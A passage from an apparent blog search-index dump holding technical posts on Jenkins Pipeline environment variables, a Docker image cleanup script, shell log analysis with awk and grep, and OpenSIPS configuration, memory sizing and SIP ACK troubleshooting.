prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.However any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.A set of environment variables are made available to all Jenkins projects, including Pipelines. The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. 
BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. 
JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISION As an example of loading variable values from Groovy: mail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. That allows you to write, for example:properties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. 
resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. 
Use checkout scm to check out sources matching Jenkinsfile.You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/08/tdeab2/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep \u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有些镜像虽然镜像名不同,但是镜像 ID 都是相同的,这时候往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less than max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G. 
when current free disk less than max free disk, remove docker images current_free_disk=`df -lh | grep centos-root | awk \u0026#39;{print strtonum($4)}\u0026#39;` df -lh echo \u0026#34;max_free_disk: $max_free_disk G\u0026#34; echo -e \u0026#34;current_free_disk: ${GREEN} $current_free_disk G ${NC}\u0026#34; if [ $current_free_disk -lt $max_free_disk ] then echo -e \u0026#34;${RED} need to clean up docker images ${NC}\u0026#34; docker images | grep none | awk \u0026#39;{print $3 }\u0026#39; | xargs docker rmi docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi else echo -e \u0026#34;${GREEN}no need clean${NC}\u0026#34; fi 注意事项 为了加快打包的速度,一般不要太频繁的删除镜像。因为老的镜像中的某些不改变的层,可以作为新的镜像的缓存,从而大大加快构建的速度。\n","permalink":"https://wdd.js.org/shell/docker-clean-tips/","summary":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep \u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有些镜像虽然镜像名不同,但是镜像 ID 都是相同的,这时候往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less than max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G.","title":"Docker镜像批量清理脚本"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; 
type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或者要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序时,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; 
test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/log-ana/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或者要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","permalink":"https://wdd.js.org/opensips/ch5/condition/","summary":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","title":"条件语句特点"},{"content":" 将opensips.cfg文件中的log_stderror的值改为yes, 让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","permalink":"https://wdd.js.org/opensips/ch7/without-log/","summary":" 将opensips.cfg文件中的log_stderror的值改为yes, 
让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","title":"opensips启动失败没有任何报错日志"},{"content":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。\n","permalink":"https://wdd.js.org/posts/2019/08/ym77uc/","summary":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。","title":"【笔记】操作系统:虚拟化 并发 持久化"},{"content":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否则只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","permalink":"https://wdd.js.org/posts/2019/08/vqergg/","summary":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否则只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","title":"问题排查方法论"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. 
Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.\n内存太小会导致OOM, 内存太大又会浪费\nUnfortunately picking this limit is not something that can be easily determined by a magic formula. The reason is that memory consumption is often influenced by a lot of external factors, like calling scenarios, traffic patterns, provisioned data, interactions with other external components (like AAA or DB servers), etc. Therefore, the only way to properly dimension the memory OpenSIPS is allowed to use is by monitoring memory usage, understanding the memory footprint and tuning this value accordingly. This article provides a few tips to achieve this goal.\n首先监控opensips的内存使用,然后根据监控的值调整合适的内存大小\nOpenSIPS内部的内存使用 opensips是个多进程程序并使用两种内存模型\n私有内存: 进程独占的内存,往往比较小 共享内存: opensips模块使用的内存,往往比较大 To understand the way OpenSIPS uses the available memory, we have to point out that OpenSIPS is a multi-process application that uses two types of memory: private and shared. Each process has its own private memory space and uses it to store local data, that does not need to be shared with other processes (i.e. parsing data). Most of the time the amount of private memory used is small, and usually fits into the default value of 2MB per process. Nevertheless understanding the way private memory is used is also necessary in order to properly dimension your platform’s memory.On the other hand, shared memory is a big memory pool that is shared among all processes. This is the memory used by OpenSIPS modules to store data used at run-time, and in most of the cases, the default value of 16MB is not enough. As I stated earlier, it is impossible to pick a “magic” value for this limit, mostly because there are a lot of considerations that affect it. The data stored in the shared memory can be classified in two categories:\n流量数据:1. 注册相关的数据;2. 
呼叫相关的数据,tm和dialog 临时数据:数据库缓存数据\nTraffic data – data generated by your customers registration data, managed by the usrloc module, is directly linked to the number of customers registered into the platform; call data, managed by the tm and dialog modules, is related to the number of simultaneous calls done through the platform. Provisioning data – data cached from the database, used to implement the platform’s logic. The amount of memory used by each of this data may vary according to the services you offer, your customer base and their traffic.\n监控内存使用 有两种方式监控内存\nOpensips CP,这个工具比较方便,但是安装比较复杂,一般不使用 通过opensips的fifo指令去获取内存。这个比较方便,可以做成crontab, 然后周期性的写入到influxdb。 There are two ways to monitor OpenSIPS memory statistics:\nfrom OpenSIPS CP Web GUI, using the statistics interface (Image 1) from cli using the opensipsctl tool: opensipsctl fifo get_statistics shmem: shmem:total_size:: 268435456 shmem:used_size:: 124220488 shmem:real_used_size:: 170203488 shmem:max_used_size:: 196065104 shmem:free_size:: 98231968 shmem:fragments:: 474863 From both you can observe 6 values:\ntotal_size: the total amount of memory provisioned used_size: the amount of memory required to store the data real_used_size: the total amount of memory required to store data and metadata max_used_size: the maximum amount of memory used since OpenSIPS started free_size: the amount of free memory fragments: the number of fragments When monitoring memory usage, the most important statistics are the max_used_size , because it indicates the minimum value OpenSIPS needs to support the traffic that has been so far and the real_used_size, because it indicates the memory used at a specific moment. 
We will use these metrics further on.\n理解内存使用 In order to have a better understanding about the memory used, we will take as an example a very specific platform: an outbound PSTN gateway, that is designed to support 500 CPS (calls per second) from customers and dispatch them to approximately 100K prefixes, cached by the drouting module. You can see the platform’s topology in this picture:\nTo figure out what happens in the scenario Image 1 presents, we will extract the real_used_size, max_used_size and active_dialogs statistics:\nAs you can observe, at the beginning of the chart, the memory usage was low, close to 0. That is most likely OpenSIPS startup. Then, it grows quickly until around 60MB. That is OpenSIPS loading the 100K of prefixes into the drouting module cache. Next, as we can see in the active_dialogs statistic, traffic comes in in batches. Therefore OpenSIPS memory usage increases gradually, until around 170MB and stabilizes with the call-flow. After a while, the dialog numbers start to decrease, and the memory is again gradually released, until it ends to the idle memory of 60MB used by the drouting cache.Taking a closer look at the charts, you will notice two awkward things in the second half of the period:\ndialog占用的内存并不是呼叫结束后立即释放,而是由计时器去延时周期性的按批次去释放 SIP事务也不是马上释放,而是会等待去耗尽网络中所有的重传消息\nopensips的很多模块往往需要一次性的把数据库中的数据加载到内存中。而在模块reload的时候,内存中会同时存在两份数据。直到新的数据完全加载完毕后,老的数据占用的内存才会释放,而在此之前,老的数据仍旧驻留在内存中,用来处理呼叫。所以在模块reload的时候,也是往往内存出现峰值的时候。 老的数据被释放之后,峰值会很快回落。\nEven though dialogs become significantly less, shared memory usage is still high. That is because dialogs are not immediately deleted from OpenSIPS memory, but on a timer job that deletes them in bulk batches from the database(increased DB performance). Also, SIP transactions are not deleted immediately after they complete, but stored for a while to absorb re-transmissions (according to RFC 3261 requirements). 
Even if there are no high amounts of dialogs coming in, there is a big spike of memory usage, which also changes the max_used_size statistic. The reason for this spike is a drouting module cache reload, over the MI (Management Interface): opensipsctl fifo dr_reload The reason for this spike is that during cache reload, OpenSIPS stores in memory two sets of data: the old one and the new one. The old set is used to route calls until the new set is fully loaded. After that, the memory for the old set is released, and the new set is used further on. Although this algorithm is used to increase the routing performance, it requires a large amount of memory during reload, usually doubling the memory used for provisioning.Following the article till now, you would say that looking at the memory statistics and correlating traffic with memory usage can be fairly easy to understand how OpenSIPS uses memory and what are the components that use more. Unfortunately that is not always true, because sometimes you might not have the entire history of the events, or the events happen simultaneously, and you can not figure out why. Therefore you might end up in a situation where you are using a large amount of memory, but cannot point out why. This makes scaling rather impossible (for both customers and provisioning rules), because you will not be able to estimate how components spread the memory among them. That is why in OpenSIPS 2.2 we added a more granular memory support, that allows you to view the memory used by each module (or group of modules). 
Memory usage in OpenSIPS 2.2 In order to enable granular memory support, you need to follow these steps:\ngenerate statistics files by running: # make generate-mem-stats 2\u0026gt; /dev/null compile OpenSIPS with extra shared memory support, by running: # make menuconfig -\u0026gt; Configure compile options -\u0026gt; Configure compile flags -\u0026gt; SHM_EXTRA_STATS\n# make all configure the groups in OpenSIPS configuration file: mem-group = \u0026#34;traffic\u0026#34;: \u0026#34;tm\u0026#34; \u0026#34;dialog\u0026#34; mem-group = \u0026#34;provision\u0026#34;: \u0026#34;drouting\u0026#34; restart OpenSIPS and follow the steps from the previous sections. Checking the statistics during peak time you will get something like this:\n# opensipsctl fifo get_statistics shmem_group_traffic: shmem_group_provision: shmem_group_traffic:fragments:: 153618 shmem_group_traffic:memory_used:: 85448608 shmem_group_traffic:real_used:: 86677612 shmem_group_provision:fragments:: 245614 shmem_group_provision:memory_used:: 53217232 shmem_group_provision:real_used:: 55182144 Checking the traffic statistics will show you exactly how much memory OpenSIPS uses for calls, while checking the provision statistics will show you the memory used by the drouting module. The rest of memory is used by other modules or by the core. If you want to track those down too, group them in a new mem-group.\nDimensioning OpenSIPS memory As you have noticed throughout this article, dimensioning OpenSIPS for a specific number of clients or provisioning data is not an easy task and requires a deep understanding of both customer traffic patterns and provisioning data, as well as OpenSIPS internals. 
We hope that using the tips provided in this article will help you have a better understanding of your platform, how memory resources are used by OpenSIPS, and how to dimension your VoIP platform to the desired scale.\n","permalink":"https://wdd.js.org/opensips/blog/memory-usage/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.","title":"理解并测量OpenSIPS的内存资源"},{"content":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself.This is one of the most common issues we get in SIP and one of the most annoying in the same time. But why it happens ?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup. And because the call was somehow partially established (as both end-points were able to exchange media), we need to focus on the signalling that takes place after the 200 OK reply (when the call is accepted by the callee). So, what do we have between the 200 OK reply and the full call setup ? 
Well, it is the ACK requests – the caller acknowledgement for the received 200 OK.And according to the RFC3261, any SIP device not receiving the ACK to its final 2xx reply has to disconnect the call by issuing a standard BYE request.So, whenever you experience such 10 seconds disconnected calls, first thing to do is to do a SIP capture/trace and to check if the callee end-device is actually getting an ACK. It is very, very important to check for ACK at the level of the callee end-device, and not at the level of caller or intermediary SIP proxies – the ACK may get lost anywhere on the path from caller to callee.\nTracing the lost ACK In order to understand how and where the ACK gets lost, we need first to understand how the ACK is routed from caller to the callee’s end-device. Without getting into all the details, the ACK is routed back to callee based on the Record-Route and Contact headers received into the 200 OK reply. So, if the ACK is mis-routed, it is mainly because of wrong information in the 200 OK.The Record-Route headers (in the 200 OK) are less to blame, as they are inserted by the visited proxies and not changed by anyone else. Assuming that you do not have some really special scenarios with SIP proxies behind NATs, we can simply discard the possibility of having faulty Record-Routes.So, the primary suspect is the Contact header in the 200 OK – this header is inserted by the callee’s end-device and it can be altered by any proxy in the middle – so there are many opportunities to get corrupted. And this mainly happens due to wrong handling of NAT presence on end-user side – yes, that’s it, a NATed callee device.\nCommon scenarios No NAT handling If the proxy does not properly handle NATed callee device, it will propagate into the 200 OK reply the private IP of the callee. And of course, this IP will be unusable when comes to routing back the ACK to the callee – the proxy will have the “impossible” mission to route to a private IP :). 
So, the ACK will get lost and call will get disconnected.\nIf the case, with OpenSIPS, you will have to review your logic in the onreply route and perform fix_nated_contact() for the 200 OK, if callee is known as NATed.\nThe correct handling and flow has to be like this:\nExcessive NAT handling While handling NATed end-points is good, you have to be careful not to over do it. If you see a private IP in the Contact header you should not automatically replace it with the source IP of the SIP packet. Or you should not do it for any incoming reply (like “let’s do it all the time, just to be sure”).\nIn a more complex scenarios where a call may visit multiple SIP proxies, the proxies may loose valuable routing information by doing excessive NAT traversal handling. Like in the scenario below, ProxyA is over doing it, by applying the NAT traversal logic also for calls coming from a proxy (ProxyB) and not only for replies coming from an end-point. By doing this, the IP coordinates of the callee will be lost from Contact header, as ProxyA has no direct visibility to callee (in terms of IP).\nIn such a case, with OpenSIPS, you will have to review your logic in the onreply route and to be sure you perform fix_nated_contact() for the 200 OK only if the reply comes from an end-point and not from another proxy.\nConclusions SIP is complicated and you have to pay attention to all the details, if you want to get it to work. Focusing only on routing the INVITE requests is not sufficient.If you come across disconnected calls:\nget a SIP capture/trace and see if the ACK gets to the callee end-point if not, check the Contact header in the 200 OK – it must point all the time to the callee end-point (a public IP) if not, check the NAT traversal logic you have in the onreply routes – be sure you do the Contact fixing only when it is needed. 
Shortly, be moderate, not too few and not too much …when comes to NAT handling ","permalink":"https://wdd.js.org/opensips/blog/miss-ack/","summary":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself.This is one of the most common issues we get in SIP and one of the most annoying in the same time. But why it happens ?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup.","title":"Troubleshooting missing ACK in SIP"},{"content":"What makes OpenSIPS such an attractive and powerful SIP solution is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting.So here there are some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages. Still the internal OpenSIPS logs (generated by the OpenSIPS code) do provide a lot of information about what OpenSIPS is doing.The challenge with the logging is to control the amount and content of messages you want to log. Otherwise you will end up with huge piles of logs, completely impossible to read and follow.By using the $log_level script variable you can dynamically change the logging level (to make it more or less verbose) from the script level. You can do this only for parts of the script:\nlog_level= -1 # errors only ….. { …… $log_level = 4; # set the debug level of the current process to DEBUG uac_replace_from(….); $log_level = NULL; # reset the log level of the current process to its default level ……. 
}\nor only for certain messages, based on source IP (you can use the permissions module for a more dynamic approach, controlled via DB)\nif ($si==”11.22.33.44″) $log_level = 4;\nor some parts of the message (you can use the dialplan module for the dynamic approach):\nif ($rU==”911″) $log_level = 4;\nIMPORTANT: do not forget to reset the log level back to default before terminating the script, otherwise that log level will be used by the current process for all the future messages it will handle.\nTracing the script execution Still, using the xlog() core function may not be the best option as it implies a high script pollution and many script changes (with restarts, of course).So, a better alternative is the script_trace() core function. Once you enabled the script tracing, OpenSIPS will start logging its steps though the script execution, printing each function that is called and its line in the script file.This script tracing is really helpful when you want to understand or troubleshoot your script execution, answering questions like “why does my script not get to this route” or “why is the script function not called” or “I do not understand how the SIP message flows through my script“….. and many other similar problems.The script_trace() function can help even more by allowing you to trace the value of certain variables (or parts of the message) during the script execution. Like “I do not understand where in script my RURI is changed“. 
